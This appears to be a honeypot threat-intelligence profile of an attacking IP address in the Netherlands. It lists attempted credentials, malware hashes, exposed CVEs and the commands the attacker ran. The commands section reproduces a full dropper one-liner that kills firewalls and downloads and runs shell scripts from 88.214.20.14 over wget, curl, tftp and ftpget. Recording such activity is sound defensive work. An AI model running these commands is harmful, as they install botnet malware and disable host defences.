Ameaca Ativa • MEDIO

185.242.3.105

Pais de Origem🇳🇱 Paises Bajos

Primeira Deteccao13/03/2026

Ultima Atividade08/04/2026

ISPNetiface Limited

🎯

346

Ataques Totais

🔌

Portas

📡

Tipos de Ataque

🦠

Malware

Geolocalizacao

Pais: 🇳🇱 Paises Bajos
Cidade: Desconhecida
ASN: AS60223
ISP: Netiface Limited

Tipos de Ataque

ssh_telnet_honeypot

Portas Atacadas

2223

Malware Associado

a1e06eef4eba8fab5c89...→e3b0c44298fc1c149afb...→

Credenciais Tentadas

🔐root/admin

28x

🔐root/Vs!KMr#G3TVA

Comandos Executados

$wget curl -o sshbins.sh http://88.214.20.14/sshbins.sh4x

pkill iptables -9; pkill firewalld -9; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; busybox wget curl -o sshbins.sh http://88.214.20.14/sshbins.sh;curl -o sshbins.sh http://88.214.20.14/sshbins.sh; wget http://88.214.20.14/sshbins.sh; chmod 777 sshbins.sh; sh sshbins.sh; tftp 88.214.20.14 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 88.214.20.14; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 88.214.20.14 ftp1.sh ftp1.sh; sh ftp1.sh

Exposicao Shodan InternetDBShodan

Dados InternetDB, nao em tempo real

Portas

Vulnerabilidades

CVE-2024-24795CVE-2022-30556CVE-2013-4365CVE-2025-66200CVE-2025-53020CVE-2023-27522CVE-2022-31813CVE-2024-47252CVE-2025-59775CVE-2025-23048CVE-2024-38473CVE-2024-43394CVE-2024-27316CVE-2006-20001CVE-2023-38709CVE-2012-4360CVE-2022-22719CVE-2024-43204CVE-2025-55753CVE-2022-28614

CPEs

cpe:/o:canonical:ubuntu_linuxcpe:/a:apache:http_server:2.4.52

Avaliacao de Risco

/100

BaixoMedioAltoCritico